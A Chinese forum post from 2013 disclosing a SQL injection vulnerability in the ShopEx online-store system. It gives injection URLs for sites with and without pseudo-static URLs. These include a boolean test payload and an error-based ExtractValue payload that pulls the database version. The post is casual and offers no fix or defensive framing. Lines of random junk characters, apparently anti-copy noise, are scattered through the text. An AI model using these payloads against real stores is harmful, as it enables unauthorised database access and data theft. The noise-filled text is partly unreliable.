注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
" r" k2 k1 q. m* C6 v9 o) O. `/ |, C. `# I; q/ m
好吧,我扯远了~~/ \( ]% ?9 Y, r3 P) D
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~; \+ l8 ~/ e$ j
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下: 7 V/ C$ V8 E2 i2 g3 i
9 u" I4 O0 f; e& D. W1 J! mhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
& w5 A3 q3 G3 B- d- L# `# y; q2 S& I; d Q' E
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html 4 D# j$ P+ h- Z' N L+ c
. F$ A$ F* a6 M6 Y
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
' s4 L: t8 S# N& U0 w7 b
' v) _0 j5 Y8 M4 x# a5 r4 rhttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
, C5 l$ |" _6 y. n
: I3 y6 l1 Y: y* ~+ W6 X$ p * d. ]6 |5 d- @6 S" G- h
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
3 x' h. {" J) N+ V5 N如何注入就不多说了,10多年的东西了…不会也会了…
5 a% z+ s0 P+ g G4 C
% o: j) z! P$ X4 y1 u! ^5 T7 f' l8 G' ~* [
' q, k" a: V3 B, C2 x
4 V/ k8 l6 f3 r8 J |
发表于 2013-2-19 08:31:27
收藏
支持
反对